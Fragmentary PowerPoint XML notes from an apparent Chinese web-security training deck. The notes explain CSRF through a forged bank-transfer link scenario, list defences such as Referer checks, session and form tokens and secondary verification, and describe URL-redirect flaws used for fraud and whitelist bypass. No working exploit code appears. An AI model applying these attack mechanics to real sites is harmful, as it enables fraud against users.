              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2977887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84D428-0A63-4D52-AE76-62950D373A99}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>当攻击者诱导用户点击下面的链接时，如果该用户登录银行网站的凭证尚未过期，那么他便在不知情的情况下将了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>102</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的账目转到了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>targetid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>20123012310</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的账户下，简单的身份验证只能保证请求发自某个用户的浏览器，却不能保证请求本身是用户自愿发出的。</a:t>
            </a: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22895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时至今日，从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>CNVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>的漏洞分布中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>应用漏洞与应用程序漏洞仍是占有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>75%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>以上。</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而漏洞原因 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" baseline="0" dirty="0"/>
              <a:t>  第一名，开发过程中的 设计错误、第二名，输入验证错误；第三名 意外情况处理错误；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" baseline="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aseline="0" dirty="0"/>
              <a:t>此项在金融行业仍然使用 </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D446B6-EAC4-4607-89DB-0623D206FF90}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3013244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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>校验，对</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>请求的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>校验，如果请求</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的地址不在允许的列表中，则拦截请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>校验，服务端生成随机</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，并保存在本次会话</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中，用户发起请求时附带</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>参数，服务端对该随机数进行校验。如果不正确则认为该请求为伪造请求拒绝该请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Formtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>校验，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Formtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>校验本身也是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>校验，只是在本次表单请求有效。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对于高安全性操作则可使用验证码、短信、密码等二次校验措施。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>增删改请求使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173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ADDBB5-07B4-42F4-B323-B8F693B48B68}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3839274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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>如果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>jsp+servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，这段代码放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>页面程序的任何位置都可以。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>      如果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，这几行代码只能加到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>页面程序的最后面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>框架在初始化时会创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对象，并把一些参数放在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>里，然后再执行页面代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181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73E5FB-5FF5-44A8-9DDA-68B4F133B2DA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="468270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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197877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恶意用户完全可以借用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转漏洞来欺骗安全意识低的用户，从而导致“中奖”之类的欺诈，这对于一些有在线业务的企业如淘宝等，危害较大，同时借助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转，也可以突破常见的基于“白名单方式”的一些安全限制，如传统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>里对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的传播会进行安全校验，但是对于大公司的域名及</a:t>
            </a:r>
            <a:r>
